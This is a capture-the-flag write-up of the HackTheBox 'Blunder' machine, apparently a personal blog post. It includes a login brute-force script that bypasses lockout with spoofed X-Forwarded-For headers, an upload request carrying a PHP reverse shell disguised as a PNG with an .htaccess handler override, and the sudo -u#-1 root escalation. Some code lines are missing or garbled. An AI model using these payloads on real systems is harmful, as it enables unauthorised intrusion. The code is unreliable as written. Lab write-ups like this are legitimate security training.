Persistence is very important. You should not give up unless you are forced to give up (Elon Musk)
Completed at 29 October 2020


Blunder is a Linux machine from HackTheBox, which is a real-life similar box that required CVE exploit technique, for training your ethical hacking and penetration testing skills.
After basic enumeration, this Linux server is a web application develops using the blunder CMS running on port 80. Using the tool Drib, some hidden files are found which contain a possible user name "fergus", and a Bruteforce protected admin login page also identifies.
After google, I find that the Bruteforce protection of this version blunder CMS can be bypassed. Get the administrative privilege account. I am trying to upload PHP reverse shell to the site via the provided image uploaded function, uploaded success but fail to get the access path. Google again, there is a CVE exploit on the Bludit that related to the directory traversal. Follow the instruction, get the low privilege access.
The system is enumerated, there is a newer version of Bludit CMS is found and a file-based user account database is identified. There is an SHA-1 hashed password of a user account hugo. Crack the password using an online tool and get this user account access.
Enumerate the system again with a tool - linpeas, the sudo version have PE vulnerability. Following the exploitDB instruction, get the root access finally.
Target Machine:
Attacker Machine:

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

nmap -p- -T5 --min-rate=1000 -oG fkclai.nmap

Details Analysis

nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV -o nmap-result.txt
Enumeration Strategy
Only port 80 open, focus on the web application and check any CVE vulnerability.

Hacking Process Part 1 – Enumeration

1.1 Enumerating the website

Using the following tools, a folder and two files are found, /admin/, /robots.txt, and /todo.txt
  • gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,php
  • dirb /usr/share/wordlists/dirb/common.txt -o dirb-191.result
  • gobuster dir -u '' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-191.result
  • python3 /root/Documents/ctf/tools/dirsearch/ -u -e jsp,txt -x 301,302,403,404 --simple-report=dirsearch-191.result
The source code of the login portal shows that it builds by the Bludit CMS and version is 3.9.2 and /todo.txt hints of a user fergus.

1.2 Get the website login

Brute forcing is not a simple task as the site is implemented the CSRF token, and after 10 login attempts my IP address being blocked. Next steps, I am going to search for any vulnerable of this bludit version and this blog is found.
I am failure by using the rockyou.txt as the password list to gain the website login access, but, it is success using cewl to gathering the wordlist from the site.
#!/usr/bin/env python3
import re
import requests
host = ''
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []
pwd = open('password.txt','r')
for line in pwd:
# Add the correct password to the end of the list
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token ='input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
login_result =, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
root@kclai:~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# cewl > password.txt
root@kclai:~/Documents/ctf/htb/linux/17-HTB-Blunder/exploit# python3
[*] Trying: CeWL 5.4.6 (Exclusion) Robin Wood ([email protected]) (
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins
[*] Trying: and
[*] Trying: Letters
[*] Trying: probably
[*] Trying: best
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain
SUCCESS: Password found!
Use fergus:RolandDeschain to login.

Hacking Process Part 2 - Initial low privilege access

Enumerated the system after got the login access, there is an image upload function. A PHP reverse shell file and ".htaccess" can be bypassed the client-side validation and uploaded to the server successfully. But the file access path cannot be found.
After searching on the exploit database, there is a CVE vulnerability on Bludit 3.9.2 that related to the directory traversal. The PoC scripts show that the UUID can be used to control the result access path.

2.1 Get the www account access

As the upload validation only applies on the client-side, thus, using the burp to change the upload parameters (value of filename), the PHP reverse shell and the.htaccessfiles are uploaded to the /tmp/folder. I can execute the reverse shell PHP by visiting the
POST /admin/ajax/upload-images HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1577569979961725874602175024
Content-Length: 11616
Connection: close
Cookie: BLUDIT-KEY=ngp0psekevm7je3hnrlhjmkj57
Content-Disposition: form-data; name="images[]"; filename="reverse.png"
Content-Type: image/png
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
// See if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = ''; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
Content-Disposition: form-data; name="uuid"
Content-Disposition: form-data; name="tokenCSRF"
#.htaccess file
RewriteEngine off
AddType application/x-httpd-php .png
Finally, the initial web server account privilege access is obtained.

2.2 Get the user account access

The system file shows that this bludit CMS setup to use the file-based database, three hashed password are found at users.php of two bludit folders. According to the official website for recovery the admin password file, this hashed password is in SHA-1 format. Using the online tool to decrypt the hashed password. The password for hugo account obtains which is Password120.
I find that Hugo reuse his password reuse on their system account. Let's spawn a PTY shell, as this will allow us to use the su command. The low privilege user account obtain.
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ python -c "import pty;pty.spawn('/bin/bash');"
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120

Hacking Process Part 3 - Privilege Escalation

Download the to study the environment search for possible paths to escalate privileges on Linux hosts. The result shows the sudo version of this system is one of the possible paths to escalate privilege.
Searching the exploit db again, there is a CVS exploit on this sudo version is identified. Following the instruction, the root privilege obtain.
hugo@blunder:~$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
hugo@blunder:/$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120


Missing patches are very common in the real-life system, we need to keep the system patches are updated to avoid know attack.